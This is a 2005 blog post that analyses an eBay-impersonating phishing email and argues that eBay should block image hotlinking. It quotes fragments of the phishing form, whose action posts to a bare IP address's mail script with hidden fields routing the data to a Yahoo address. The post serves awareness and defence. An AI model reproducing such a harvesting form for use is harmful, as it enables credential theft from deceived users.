September 15, 2005

How eBay can help stop Phishing

Technical Discussions — Sarah King

I just received a sternly worded email from "eBay" of which I am not a registered user. Out of curiousity I decided to view the source of the email and see which tricks this nasty Phisher had employed

I copied one of their links and was taken to a page on this server: http://64.4.16.250/cgi-bin/linkrd? and this clever little page that interrogated the server variables for info about my PC

PLAIN TEXT
HTML:
  1. <html><head><title> - More Useful Everyday</title></head>Your email message has been idle and this link has become inactive. To access the link, <a href="javascript:window.close();">close this window and return to your </a> Message. Then click the browser's Refresh button or close your message and reopen it.</html><!-- H: BAY22-F20.phx.gbl -->
  2. <!-- V: WIN2K3 10.21.0000.0016 i -->
  3. <!-- D: Aug  8 2005 14:46:21-->
  4. <!-- S: 0-->

The form itself had this info in it

PLAIN TEXT
HTML:
  1. <form action="http://84.243.125.22/mailgate.php" method=post>
  2. <input type="hidden" name="mailto" value="devphobia@yahoo.com"/>
  3. <input type="hidden" name="subject" value="e-bay account"/>
  4. <input type="hidden" name="redirect" value="www.ebay.com"/>

In my other Phishing emails post I talk about how you should check where the links are pointing to, and to check it out before doing anything. Well, this email was littered with valid eBay links, for the images and other info. That makes it really hard to determine what is what.

I found unnecessary and worrying that the Phishers were able to use eBay's own images!
such as an image from eBay, if its broken then they've fixed it!

PLAIN TEXT
HTML:
  1. <img height=16 src="https://scgi.ebay.com/saw/pics/sitewide/processBar1_16x16.gif" width=16/>

and

PLAIN TEXT
HTML:
  1. <img height=3 src="https://scgi.ebay.com/saw/pics/sitewide/leftLine_16x3.gif" width=16 align=middle/>

Now the use of a border isn't going to do much but atleast make it difficult and prevent hotlinking outside the domain!

Also on this site

Tags: , , , ,

« Google’s Blog Search loves me!
Directory listings: You can ask, but you may not get… »

2 Comments »

  1. And if using their formatting graphics isn’t bad enough, today I have one using their logo…

    Comment by sarahk — September 17, 2005 @ 7:43 am

  2. I just discovered the Anti-Phishing Working Group. eBay is a member.

    Comment by sarahk — October 23, 2005 @ 10:13 am

Leave a comment

RSS feed for comments on this post. TrackBack URI

Search

Pages

Categories:

Recent Comments

Other Resources

  • 1. Portfolio
  • 2. Essentials
  • 3. Code Examples
  • 4. Social Networking
  • 5. Just for fun
    • Subscribe in NewsGator Online

    © Copyright 2003 - 2008 Estatement Ltd

    Powered by WordPress